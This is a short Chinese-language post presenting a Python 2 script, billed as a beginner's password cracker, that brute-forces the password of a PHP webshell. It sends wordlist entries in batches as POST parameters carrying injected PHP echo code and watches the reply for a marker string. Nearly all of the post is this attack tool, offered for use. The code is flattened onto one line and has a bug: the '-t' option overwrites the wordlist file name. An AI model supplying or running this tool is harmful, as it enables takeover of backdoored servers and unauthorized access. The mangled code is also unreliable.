适用于新手的python密码破解器,代码如下:
#!/usr/bin/python #-*- coding: GB2312 -*- #author:loversorry import urllib2 import urllib import os import sys import getopt import base64 def usage(): print sys.argv[0]+" -u [url]http://www.xxx.com/webshell.php[/url] -t php -f ./password.txt -i 1000" def readFile(): posts = {} posts_arr = [] f = open(file_name,'r') i = 0 for line in f.readlines(): line = line.replace('\n','') temp = base64.b64encode(line+'**==**1a1a1a').replace('=',''); posts[line]='$a=%s;$b=base64_decode($a);echo($b);' % temp i = i+1 if i>int(num)-1: posts_arr.append(str(posts)) posts.clear() i = 0 if len(posts): posts_arr.append(str(posts)) f.close() return posts_arr def intruder(postDatas): headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0' } ok = False for item in range(len(postDatas)): postData = postDatas[item] postData = urllib.urlencode(eval(postData)) request = urllib2.Request(url,postData,headers) response = urllib2.urlopen(request) text = response.read() if text.find('1a1a1a') <> -1: print '\n破解成功,密码为:'+text.split('**==**')[0] ok = True break else: sys.stdout.write(".") return ok if __name__ == '__main__': opts,args = getopt.getopt(sys.argv[1:],'hu:t:f:i:') url = '' server_type = '' file_name = '' num = '' for opt,value in opts: if opt == '-u': url = value elif opt == '-t': file_name = value elif opt == '-f': file_name = value elif opt == '-i': num = value elif opt == '-h': usage() sys.exit() if file_name == '' or num == '' or url == '': usage() sys.exit() sys.stdout.write("开始破解:") if intruder(readFile()) == False: print '\n破解失败,换字典试试!'